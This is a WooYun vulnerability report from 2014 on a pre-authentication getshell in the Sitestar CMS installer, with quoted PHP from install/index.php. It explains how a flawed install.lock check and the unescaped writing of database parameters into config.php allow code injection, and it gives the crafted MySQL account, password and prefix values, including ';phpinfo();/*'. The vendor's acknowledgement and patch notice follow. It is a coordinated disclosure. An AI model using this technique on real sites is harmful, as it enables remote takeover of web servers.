当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054387

漏洞标题:建站之星Sitestar前台Getshell一枚

相关厂商:建站之星

漏洞作者: ′雨。

提交时间:2014-03-23 17:54

修复时间:2014-06-21 17:55

公开时间:2014-06-21 17:55

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-23: 细节已通知厂商并且等待厂商处理中
2014-03-23: 厂商已经确认,细节仅向厂商公开
2014-03-26: 细节向第三方安全合作伙伴开放
2014-05-17: 细节向核心白帽子及相关领域专家公开
2014-05-27: 细节向普通白帽子公开
2014-06-06: 细节向实习白帽子公开
2014-06-21: 细节向公众公开

简要描述:

看sitestar 在某数字公司还是属于一般应用的, 就准备提数字了。
太坑了 然后果断拒绝提交详情。 还是提到乌云来把。
不知道sitestar在乌云是不是属于一般应用的? 狗哥给个回应哈。
Sitestar 前台Getshell。 无需登录。

详细说明:

在官方论坛上下的最新版
在 install/index.php中

define('IN_CONTEXT', 1);
include_once('load.php');
?>

包含进来 那再继续看看。

$lockfile = ROOT.'/install.lock';
$pattern_db = '/[0-9a-zA-Z]*$/';
if(!preg_match($pattern_db, $db_name)||!preg_match($pattern_db, $db_user)){
echo '1001';exit;
}
if(file_exists($lockfile) && ($_a=='template' || $_a=='setting' || $_a=='check')) {
exit('please delete install.lock!');
}


这里判断了Lock 而且if(file_exists($lockfile) && ($_a=='template' || $_a=='setting' || $_a=='check')
关键这里是一个and 而不是一个or 只要不满足后面的 也就不会退出了。
继续看后面的码。

if($_a=='template'){
include P_TPL."/template.php";
}else if($_a=='check'){
include P_TPL."/check.php";
}else if($_a=='setting'){
$default_tpl = ParamHolder::get("default_tpl","jixie-110118-a16");
$_SESSION['default_tpl'] = $default_tpl;
include P_TPL."/setting.php";
}else if($_a=='result'){
$domain = $_SERVER['HTTP_HOST'];
if(isset($_SERVER['SERVER_ADDR'])){
$ip = $_SERVER['SERVER_ADDR'];
}else{
$ip='127.0.0.1';
}
$version = 'sitestar_v2.7_build131012';
$system = preg_replace('/\s/','',PHP_OS);
$vphp = PHP_VERSION;
$vmysql = $_SESSION['vmysql'];
$tpl_name = $_SESSION['default_tpl'];
$http = new Http("http://licence.sitestar.cn/feedback.php?domain=$domain&ip=$ip&version=$version&vphp=$vphp&vmysql=$vmysql&tpl_name=$tpl_name&vos=$system");
$http->get();
include P_TPL."/result.php";
create_file($version);
}else if($_a=='checkconnection'){
$link = @mysql_connect($db_host,$db_user,$db_pwd);
if (!$link) {
echo '1001';
exit;
}
$r = mysql_select_db($db_name,$link);
if(!$r){
echo '1002';
exit;
}
}else if($_a=="create"){
$link = mysql_connect($db_host,$db_user,$db_pwd);
if (!$link) {
echo '1001';
exit;
}
$r = mysql_select_db($db_name,$link);
if(!$r){
echo '1002';
exit;
}

$rtn = create_table($db_name,$db_prefix,INSTALL_ROOT.'/../sql/basic.sql');
if(!empty($rtn)){
echo '1005';
exit;
}
mysql_query("INSERT INTO `".$db_prefix."parameters` (`id`, `key`, `val`) VALUES (NULL, 'DEFAULT_TPL', '".$_SESSION['default_tpl']."')");
//uploadcopy(ROOT."/template/".$_SESSION['default_tpl']."/".$_SESSION['default_tpl']."_2_upload/image",ROOT."/upload/image");
//uploadcopy(ROOT."/template/".$_SESSION['default_tpl']."/".$_SESSION['default_tpl']."_2_upload/flash",ROOT."/upload/flash");
if($demo=='1'){
create_table($db_name,$db_prefix,ROOT."/template/".$_SESSION['default_tpl']."/".$_SESSION['default_tpl'].'_2_sample.sql');
} else {
mysql_query("INSERT INTO `".$db_prefix."static_contents` (`id` ,`title` ,`content` ,`create_time` ,`s_locale` ,`published` ,`for_roles`) VALUES ('1', '', NULL , '', 'zh_CN', '1', '{member}{admin}{guest}');");
mysql_query("INSERT INTO `".$db_prefix."static_contents` (`id` ,`title` ,`content` ,`create_time` ,`s_locale` ,`published` ,`for_roles`) VALUES ('2', '', NULL , '', 'zh_CN', '1', '{member}{admin}{guest}');");
mysql_query("INSERT INTO `".$db_prefix."static_contents` (`id` ,`title` ,`content` ,`create_time` ,`s_locale` ,`published` ,`for_roles`) VALUES ('3', '', NULL , '', 'en', '1', '{member}{admin}{guest}');");
mysql_query("INSERT INTO `".$db_prefix."static_contents` (`id` ,`title` ,`content` ,`create_time` ,`s_locale` ,`published` ,`for_roles`) VALUES ('4', '', NULL , '', 'en', '1', '{member}{admin}{guest}');");
}

echo '1003';
}else if($_a=="createadmin"){
$link = mysql_connect($db_host,$db_user,$db_pwd);
if (!$link) {
echo '1001';
exit;
}
$r = mysql_select_db($db_name,$link);
if(!$r){
echo '1002';
exit;
}
mysql_query("set names utf8");
mysql_select_db($db_name,$link);
$mysql_query = mysql_query("select VERSION()");
$mysql_row = mysql_fetch_row($mysql_query);
$vmysql = $mysql_row[0];
$_SESSION['vmysql'] = $mysql_row[0];
$passwd = sha1($admin_pwd);
$tme = time();
if ($link) {
create_config($db_host1,$db_user,$db_pwd,$db_name,$db_prefix,$db_port);
}
$query = mysql_query("insert into ".$db_prefix."users(login,passwd,email,lastlog_time,rstpwdreq_time,active,s_role) values('$admin_name','$passwd','admin@admin.com','$tme','0','1','{admin}')");
$insert_id = mysql_insert_id();
$query = mysql_query("insert into ".$db_prefix."user_extends(total_saving,total_payment,balance,user_id) values('0.00','0.00','0.00','$insert_id')");
if($query){
echo '1004';
}


可以看到 除开 template setting 和check 还有其他的
来找找哪个可以利用的。

}else if($_a=="createadmin"){
$link = mysql_connect($db_host,$db_user,$db_pwd);
if (!$link) {
echo '1001';
exit;
}
$r = mysql_select_db($db_name,$link);
if(!$r){
echo '1002';
exit;
}
mysql_query("set names utf8");
mysql_select_db($db_name,$link);
$mysql_query = mysql_query("select VERSION()");
$mysql_row = mysql_fetch_row($mysql_query);
$vmysql = $mysql_row[0];
$_SESSION['vmysql'] = $mysql_row[0];
$passwd = sha1($admin_pwd);
$tme = time();
if ($link) {
create_config($db_host1,$db_user,$db_pwd,$db_name,$db_prefix,$db_port);
}
$query = mysql_query("insert into ".$db_prefix."users(login,passwd,email,lastlog_time,rstpwdreq_time,active,s_role) values('$admin_name','$passwd','admin@admin.com','$tme','0','1','{admin}')");
$insert_id = mysql_insert_id();
$query = mysql_query("insert into ".$db_prefix."user_extends(total_saving,total_payment,balance,user_id) values('0.00','0.00','0.00','$insert_id')");


我所利用的是这个。 貌似可以直接添加一个管理。 但是不甘心, 看看能不能直接Getshell。

$link = mysql_connect($db_host,$db_user,$db_pwd);
if (!$link) {
echo '1001';
exit;
}
$r = mysql_select_db($db_name,$link);
if(!$r){
echo '1002';
exit;
}


首先看这里。 要检测mysql是否能够连接得上, 并且$db_name 得存在这个mysql中。

$_a = ParamHolder::get("_a","");
$_m = ParamHolder::get("_m","frontpage");
$db_host1 = ParamHolder::get("db_host","");
$db_user = ParamHolder::get("db_user","");
$db_pwd = ParamHolder::get("db_pwd","");
$db_name = ParamHolder::get("db_name","");
$db_prefix = ParamHolder::get("db_prefix","");
$db_port = ParamHolder::get("db_port","");
$admin_name = ParamHolder::get("admin_name","");
$admin_pwd = ParamHolder::get("admin_pwd","");
$demo = ParamHolder::get("demo","");
$db_host = $db_host1.":".$db_port;


可以看到哪些参数都是可控的。
我们自己搭建一个mysql 可外联就行了。

$pattern_db = '/[0-9a-zA-Z]*$/';


if(!preg_match($pattern_db, $db_name)||!preg_match($pattern_db, $db_user)){
echo '1001';exit;
}


匹配出除开0-9 a-z A-Z 以外的就退出。

$passwd = sha1($admin_pwd);
$tme = time();
if ($link) {
create_config($db_host1,$db_user,$db_pwd,$db_name,$db_prefix,$db_port);
}


这里 跟进去

function create_config($host,$user,$pwd,$dnname,$pre,$port){
$str = "";
$str .= "<?php \n";
$str.="if (!defined('IN_CONTEXT')) die('access violation error!');\n";
$str.="class Config {\n";
$str .= "public static \$mysql_ext = 'mysql';\n";
$str .= "public static \$db_host = '$host';\n";
$str .= "public static \$db_user = '$user';\n";
$str .= "public static \$db_pass = '$pwd';\n";
$str .= "public static \$db_name = '$dnname';\n";
$str .= "public static \$port = '$port';\n";
$str .= "public static \$mysqli_charset = 'utf8';\n";
$str .= "public static \$tbl_prefix = '$pre';\n";
$str .= "public static \$cookie_prefix = '".randomStr(6)."_';\n";
$str .= "public static \$enable_db_debug = false;\n";
$str .= "}?>\n";
file_put_contents("../config.php",$str);


可以看到 直接写到一个php文件里了。 这时候 好像一切都ok了。
可是 一切又没有那么的容易。

s1.jpg


access violation error!
是不能含有单引号的。 但是在这里 关键的是 他没有过滤转义符。。
然后就进入了无尽的测试当中。。

function create_config($host,$user,$pwd,$dnname,$pre,$port){
$str = "";
$str .= "<?php \n";
$str.="if (!defined('IN_CONTEXT')) die('access violation error!');\n";
$str.="class Config {\n";
$str .= "public static \$mysql_ext = 'mysql';\n";
$str .= "public static \$db_host = '$host';\n";
$str .= "public static \$db_user = '$user';\n";
$str .= "public static \$db_pass = '$pwd';\n";
$str .= "public static \$db_name = '$dnname';\n";
$str .= "public static \$port = '$port';\n";
$str .= "public static \$mysqli_charset = 'utf8';\n";
$str .= "public static \$tbl_prefix = '$pre';\n";
$str .= "public static \$cookie_prefix = '".randomStr(6)."_';\n";
$str .= "public static \$enable_db_debug = false;\n";
$str .= "}?>\n";
file_put_contents("../config.php",$str);


看这个 理论上来说 只有

$str .= "public static \$mysqli_charset = 'utf8';\n";
$str .= "public static \$cookie_prefix = '".randomStr(6)."_';\n";
$str .= "public static \$enable_db_debug = false;\n";


这三行不可控, 但是 由于

$str .= "public static \$db_host = '$host';\n";
$str .= "public static \$db_user = '$user';\n";
$str .= "public static \$db_pass = '$pwd';\n";
$str .= "public static \$db_name = '$dnname';\n";


这四个 会用来连接 如果连接不上的话 就退出了。 就算不上能随意控制。

$str .= "public static \$port = '$port';\n";
$str .= "public static \$mysqli_charset = 'utf8';\n";
$str .= "public static \$tbl_prefix = '$pre';\n";


就剩下了这两个可控。 但是中间还有了个不可控的。
如果两个可控的挨在一起的话 可以这样
public static $port = '\';
public static $tbl_prefix = ';phpinfo();/*';
但是由于中间多了一个不可控的 所以不能直接这样。。
如果可控的两行没挨在一起的话
那么可控的必须要三行了 才能执行了。。 那怎么办呢?
DB_HOST 肯定是不能改的 要不就连不上了。
那就要从 DB_NAME db_user 和 db_pwd 下手了。

$pattern_db = '/[0-9a-zA-Z]*$/';
if(!preg_match($pattern_db, $db_name)||!preg_match($pattern_db, $db_user)){
echo '1001';exit;
}


这里的正则 验证了 db_name 和 db_user 但是 这中间连接的是一个or。
那只要让一个匹配不出除开09 az AZ以外的就行了。
那就让db_name匹配不出 因为我测试了db_name 在我创建数据库的时候无法添加符号的。
这样只有从db_user 和 db_pwd 下手了。
在本地的mysql里 建一个含有特殊字符的 账户 和 密码。
让账户为test@localhost\ 密码为;/*
这样类似的就行了。
来测试测试。

漏洞证明:

s5.jpg


首先建立一个账户。 要记得对一些字符转义。
然后 访问

s6.jpg


来看看配置文件。

s7.jpg


直接访问首页。

s8.jpg


成功getshell。

修复方案:

说得很清楚啦。
低调求20.

版权声明:转载请注明来源 ′雨。@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-03-23 21:46

厂商回复:

漏洞利用的条件比较严格,按照表述至少还需要知道mysql的相关权限,而这个对于外部客户来说是几乎很难的一个前提,但是鉴于你的严格的逻辑分析和如此清楚的描述,给15分以表谢意,我们会尽快发布安全补丁。

最新状态:

2014-03-27:我们已经发布了安全补丁,请相关用户在后台点击升级就可以,为了让用户有个升级期,漏洞先不提前公开,让大家能够有时间去升级。谢谢白帽子的支持和理解。